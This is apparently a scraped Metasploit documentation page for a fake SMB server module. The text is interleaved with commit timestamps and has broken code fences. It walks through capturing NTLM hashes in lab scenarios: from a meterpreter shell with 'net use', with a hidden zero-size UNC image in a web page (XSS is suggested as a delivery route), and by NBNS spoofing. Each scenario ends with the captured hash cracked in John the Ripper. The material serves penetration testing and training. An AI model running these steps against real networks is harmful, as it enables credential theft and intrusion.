2022-03-02 22:35:52 +00:00
This module creates a mock SMB server which accepts credentials before returning `NT_STATUS_LOGON_FAILURE` .
Supports SMBv1, SMBv2, & SMBv3 and captures NTLMv1 & NTLMv2 hashes.
2019-09-26 19:02:57 -04:00
2019-09-25 22:50:18 -04:00
## Verification Steps
2021-08-13 15:45:58 +01:00
Microsoft provides an article on how to detect, disable, and enable SMB in various versions
[here ](https://support.microsoft.com/en-us/help/2696547/detect-enable-disable-smbv1-smbv2-smbv3-in-windows-and-windows-server ), which can be useful during testing.
2019-09-25 22:50:18 -04:00
2021-08-13 15:45:58 +01:00
1. Start msfconsole
2021-08-13 17:49:46 +01:00
2. Connect DB
3. Do: ```use auxiliary/server/capture/smb` ``
4. Do: ```run` ``
5. Connect to above server with your SMB client of choice
6. Observe the capturing of hash
7. `creds`
8. check hash has been stored in DB correctly
2021-08-16 16:57:49 +01:00
9. `hosts`
10. check client IP has been added to the DB
2019-09-25 22:50:18 -04:00
## Options
2021-08-13 15:45:58 +01:00
**CAINPWFILE **
2019-09-25 22:50:18 -04:00
2021-08-13 15:45:58 +01:00
A file to store Cain & Abel formatted captured hashes in. Only supports NTLMv1 Hashes.
2019-09-25 22:50:18 -04:00
2021-08-13 15:45:58 +01:00
**CHALLENGE **
2019-09-25 22:50:18 -04:00
2021-08-13 15:45:58 +01:00
The 8 byte server challenge. If unset or not a valid 16 character hexadecimal pattern, a random challenge is used instead.
2019-09-25 22:50:18 -04:00
2022-05-27 14:41:06 -04:00
The format is `1122334455667788` .
2021-08-13 15:45:58 +01:00
**JOHNPWFILE **
2019-09-25 22:50:18 -04:00
2021-08-16 16:57:49 +01:00
A file to store John the Ripper formatted hashes in. NTLMv1 and NTLMv2 hashes will be stored in separate files.
I.E. the filename john will produce two files, `john_netntlm` and `john_netntlmv2` .
2019-09-25 22:50:18 -04:00
2021-08-13 15:45:58 +01:00
**DOMAIN **
2019-09-25 22:50:18 -04:00
2021-08-13 15:45:58 +01:00
The domain name used during smb exchange.
2019-09-25 22:50:18 -04:00
2021-08-16 16:57:49 +01:00
**TIMEOUT **
Seconds that the server socket will wait for a response after the client has initiated communication.
This only applies to the server waiting on the client to respond with [a type3 message ](http://davenport.sourceforge.net/ntlm.html#theType3Message ).
2021-08-13 15:45:58 +01:00
## Scenarios
2019-09-25 22:53:45 -04:00
2021-08-13 15:45:58 +01:00
### Linux Connection via smbclient
2019-09-25 22:50:18 -04:00
2021-08-13 15:45:58 +01:00
Kali 2021.1 with `smbclient 4.13.5` installed.
2019-09-25 22:50:18 -04:00
Server:
```
2021-08-13 15:45:58 +01:00
msf6 exploit(multi/handler) > use auxiliary/server/capture/smb
msf6 auxiliary(server/capture/smb) > set JOHNPWFILE /tmp/john
JOHNPWFILE => /tmp/john
msf6 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 1.
[+] Server is running. Listening on 0.0.0.0:445
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client : 192.168.1.48
[SMB] NTLMv2-SSP Username : WORKGROUP\kali
2021-08-16 16:57:49 +01:00
[SMB] NTLMv2-SSP Hash : kali::WORKGROUP:6ca4b2b2e5171437:f2857b13094f4a758bc448e1801dd86d:0101000000000000800fb2f5a792d70174175e23a95cd935000000000200120061006e006f006e0079006d006f00750073000100120061006e006f006e0079006d006f00750073000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f007500730007000800800fb2f5a792d70106000400020000000800300030000000000000000000000000000000d89391afb90f05c54afaef7d0bc25c7bf14aee2965d714c6fec0a626329cd8dc0a001000000000000000000000000000000000000900220063006900660073002f003100390032002e003100360038002e00380039002e00310000000000
2019-09-25 22:50:18 -04:00
```
Client:
```
2021-08-13 15:45:58 +01:00
root@Kali:~# smbclient //192.168.89.1/fake
2019-09-25 22:50:18 -04:00
Enter WORKGROUP\root's password:
session setup failed: NT_STATUS_LOGON_FAILURE
```
Crack the Hash:
2021-08-16 16:57:49 +01:00
(This hash is NTLMv2)
2019-09-25 22:50:18 -04:00
```
2021-08-13 15:45:58 +01:00
# cat /tmp/john
2021-08-16 16:57:49 +01:00
kali::WORKGROUP:6ca4b2b2e5171437:f2857b13094f4a758bc448e1801dd86d:0101000000000000800fb2f5a792d70174175e23a95cd935000000000200120061006e006f006e0079006d006f00750073000100120061006e006f006e0079006d006f00750073000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f007500730007000800800fb2f5a792d70106000400020000000800300030000000000000000000000000000000d89391afb90f05c54afaef7d0bc25c7bf14aee2965d714c6fec0a626329cd8dc0a001000000000000000000000000000000000000900220063006900660073002f003100390032002e003100360038002e00380039002e00310000000000
2019-09-25 22:50:18 -04:00
# john /tmp/john_netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
2021-08-16 16:57:49 +01:00
Will run 4 OpenMP threads
2019-09-25 22:50:18 -04:00
Press 'q' or Ctrl-C to abort, almost any other key for status
2021-08-16 16:57:49 +01:00
jim (kali)
1g 0:00:00:00 DONE (2021-08-16 10:08) 5.555g/s 785066p/s 785066c/s 785066C/s katiekatie..charles14
2019-09-25 22:50:18 -04:00
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
```
### Windows XP via net use
2021-08-13 15:45:58 +01:00
Based off of [hackers-arise.com ](https://web.archive.org/web/20210503073722/https://www.hackers-arise.com/post/2018/11/19/metasploit-basics-part-20-creating-a-fake-smb-server-to-capture-credentials )
2019-09-25 22:50:18 -04:00
The idea here is we have a shell on a Windows box where we can't `hashdump` due to user permissions.
However, we're able to do a `net use` to make an `SMB` connection back to our server to get the
user's hash, then hopefully crack it.
```
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
meterpreter > background
[*] Backgrounding session 1...
2021-08-13 15:45:58 +01:00
msf6 exploit(multi/handler) > use auxiliary/server/capture/smb
msf6 auxiliary(server/capture/smb) > set JOPHNPWFILE /tmp/john
JOHNPWFILE => /tmp/john
msf6 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 1.
[+] Server is running. Listening on 0.0.0.0:445
2019-09-25 22:50:18 -04:00
2021-08-13 15:45:58 +01:00
msf6 auxiliary(server/capture/smb) > sessions -i 1
2019-09-25 22:50:18 -04:00
[*] Starting interaction with 1...
meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
2021-08-13 15:45:58 +01:00
C:\Documents and Settings\test\Desktop>net use \\192.168.89.1 fake
2019-09-25 22:50:18 -04:00
2021-08-13 15:45:58 +01:00
[+] Received SMB connection on Auth Capture Server!
2021-08-16 16:57:49 +01:00
[SMB] NTLMv1-SSP Client : 192.168.89.135
[SMB] NTLMv1-SSP Username : ADAM-9256FBF58E\Administrator
[SMB] NTLMv1-SSP Hash : Administrator::ADAM-9256FBF58E:440a272a2f9e82c9ec09d91931fa04152cef3cac3a5563d7:4a919f3243d06d6c9c14ebff4639455e294de86cbe2bb953:66092f7f74758d2f
2019-09-25 22:50:18 -04:00
Logon failure: unknown user name or bad password.
C:\Documents and Settings\test\Desktop>
```
2021-08-16 16:57:49 +01:00
We're now able to use John the Ripper to crack the password. As the above hash is NTLMv1, the format must be specified as
2019-09-25 22:50:18 -04:00
```
# cat /tmp/john_netntlm
2021-08-16 16:57:49 +01:00
Administrator::ADAM-9256FBF58E:440a272a2f9e82c9ec09d91931fa04152cef3cac3a5563d7:4a919f3243d06d6c9c14ebff4639455e294de86cbe2bb953:66092f7f74758d2f
2019-09-25 22:50:18 -04:00
# john /tmp/john_netntlm --format=netlm --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 1 password hash (netlm, LM C/R [DES 32/64])
Warning: poor OpenMP scalability for this hash type, consider --fork=8
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
FAKE (test)
1g 0:00:00:00 DONE (2019-09-25 22:28) 1.333g/s 1398Kp/s 1398Kc/s 1398KC/s 123456..LATISHA1
Use the "--show --format=netlm" options to display all of the cracked passwords reliably
Session completed
```
2019-09-26 19:02:57 -04:00
### UNC in Websites Vector
One way to coax a user into creating an SMB connection is to embed it in a website
First, create the website (we're using Kali for this) with the following content:
2021-08-13 15:45:58 +01:00
2021-08-16 13:27:00 +01:00
```html
2019-09-26 19:02:57 -04:00
<html>
2021-08-16 13:27:00 +01:00
<head>
<title>UNC Example</title>
</head>
<body>
<img src="file:////192.168.89.1/fake.jpg" width="0px" height="0px">
</body>
2019-09-26 19:02:57 -04:00
</html>
` ``
This file, for the example is in ` /var/www/html/unc.html`.
Also of note, this could be done via XSS or other injection technique.
2021-08-13 15:45:58 +01:00
Start the webserver:
2022-03-02 22:35:52 +00:00
` ``
service apache2 start
` ``
2019-09-26 19:02:57 -04:00
Server:
2021-08-13 15:45:58 +01:00
2019-09-26 19:02:57 -04:00
` ``
2021-08-13 15:45:58 +01:00
msf6 > use auxiliary/server/capture/smb
msf6 auxiliary(server/capture/smb) > set JOHNPWFILE /tmp/john
JOHNPWFILE => /tmp/john
msf6 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 1.
[+] Server is running. Listening on 0.0.0.0:445
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv1-SSP Client : 192.168.89.135
[SMB] NTLMv1-SSP Username : ADAM-9256FBF58E\Administrator
2021-08-16 16:57:49 +01:00
[SMB] NTLMv1-SSP Hash : Administrator::ADAM-9256FBF58E:e588849d18b2a64c8fd6e26a755e5f5524ffb56c273553be:718bcfd52364e9abafc5af05ee5a60c4c068e7feda9cfe64:b3c8cdb98e907d1a
2019-09-26 19:02:57 -04:00
` ``
Client:
2021-08-13 15:45:58 +01:00
2019-09-26 19:02:57 -04:00
` ``
Browse to the webpage. This example is on Windows Server 2008r2 with Internet Explorer.
` ``
Crack the password:
2021-08-13 15:45:58 +01:00
2019-09-26 19:02:57 -04:00
` ``
2021-08-16 16:57:49 +01:00
# john /tmp/johnnbns_netntlm --wordlist=/usr/share/wordlists/rockyou.txt
2019-09-26 19:02:57 -04:00
Using default input encoding: UTF-8
2021-08-16 16:57:49 +01:00
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
2019-09-26 19:02:57 -04:00
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
2021-08-16 16:57:49 +01:00
adam (adam)
6g 0:00:00:00 DONE (2019-09-26 16:25) 100.0g/s 614400p/s 3686Kc/s 3686KC/s dyesebel..holaz
Use the "--show --format=netntlm" options to display all of the cracked passwords reliably
2019-09-26 19:02:57 -04:00
Session completed
` ``
### Spoofing NBNS
If the target(s) are on the local network, it's possible to conduct an ` nbns` spoof to attract
additional SMB queries to your host. This scenario will utilize ` auxiliary/spoof/nbns/nbns_response`
to conduct the spoofing. If a Windows user attempts to browse or mount a network name such as
` \\fake`, the ` nbns` module will respond back with the set IP.
This is based on [hackingarticles.in](https://www.hackingarticles.in/4-ways-capture-ntlm-hashes-network/)
Server side:
2021-08-13 15:45:58 +01:00
2019-09-26 19:02:57 -04:00
` ``
2021-08-13 15:45:58 +01:00
msf6 > use auxiliary/server/capture/smb
msf6 auxiliary(server/capture/smb) > set JOHNPWFILE /tmp/johnnbns
JOHNPWFILE => /tmp/johnnbns
msf6 auxiliary(server/capture/smb) > run
2019-09-26 19:02:57 -04:00
[*] Auxiliary module running as background job 0.
2021-08-13 15:45:58 +01:00
[+] Server is running. Listening on 0.0.0.0:445
msf6 auxiliary(server/capture/smb) > use auxiliary/spoof/nbns/nbns_response
msf6 auxiliary(spoof/nbns/nbns_response) > set spoofip 192.168.89.1
spoofip => 192.168.89.1
msf6 auxiliary(spoof/nbns/nbns_response) > set interface eth0
2019-09-26 19:02:57 -04:00
interface => eth0
2021-08-13 15:45:58 +01:00
msf6 auxiliary(spoof/nbns/nbns_response) > exploit
2019-09-26 19:02:57 -04:00
[*] Auxiliary module running as background job 1.
2021-08-13 15:45:58 +01:00
msf6 auxiliary(spoof/nbns/nbns_response) >
2019-09-26 19:02:57 -04:00
[*] NBNS Spoofer started. Listening for NBNS requests with REGEX ".*" ...
2021-08-13 15:45:58 +01:00
[+] 192.168.89.135 nbns - FAKE matches regex, responding with 192.168.89.1
[+] 192.168.89.135 nbns - FAKE matches regex, responding with 192.168.89.1
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv1-SSP Client : 192.168.89.135
[SMB] NTLMv1-SSP Username : ADAM-9256FBF58E\Administrator
2021-08-16 16:57:49 +01:00
[SMB] NTLMv1-SSP Hash : Administrator::ADAM-9256FBF58E:e588849d18b2a64c8fd6e26a755e5f5524ffb56c273553be:718bcfd52364e9abafc5af05ee5a60c4c068e7feda9cfe64:b3c8cdb98e907d1a
2019-09-26 19:02:57 -04:00
` ``
Victim:
2021-08-13 15:45:58 +01:00
2019-09-26 19:02:57 -04:00
` ``
Open Explorer and type \\fake
` ``
Finally, Crack the password:
2021-08-13 15:45:58 +01:00
2019-09-26 19:02:57 -04:00
` ``
2021-08-16 16:57:49 +01:00
# john /tmp/johnnbns_netntlm --wordlist=/usr/share/wordlists/rockyou.txt
2019-09-26 19:02:57 -04:00
Using default input encoding: UTF-8
2021-08-16 16:57:49 +01:00
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
2019-09-26 19:02:57 -04:00
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
2021-08-16 16:57:49 +01:00
adam (adam)
2019-09-26 19:02:57 -04:00
6g 0:00:00:00 DONE (2019-09-26 16:25) 100.0g/s 614400p/s 3686Kc/s 3686KC/s dyesebel..holaz
2021-08-16 16:57:49 +01:00
Use the "--show --format=netntlm" options to display all of the cracked passwords reliably
2019-09-26 19:02:57 -04:00
Session completed
` ``
### Word Document UNC Injector
Another strategy is to create content which can entice a user to open, containing a UNC link, and
thus creating an SMB connection. To accomplish this, we use ` auxiliary/docx/word_unc_injector`.
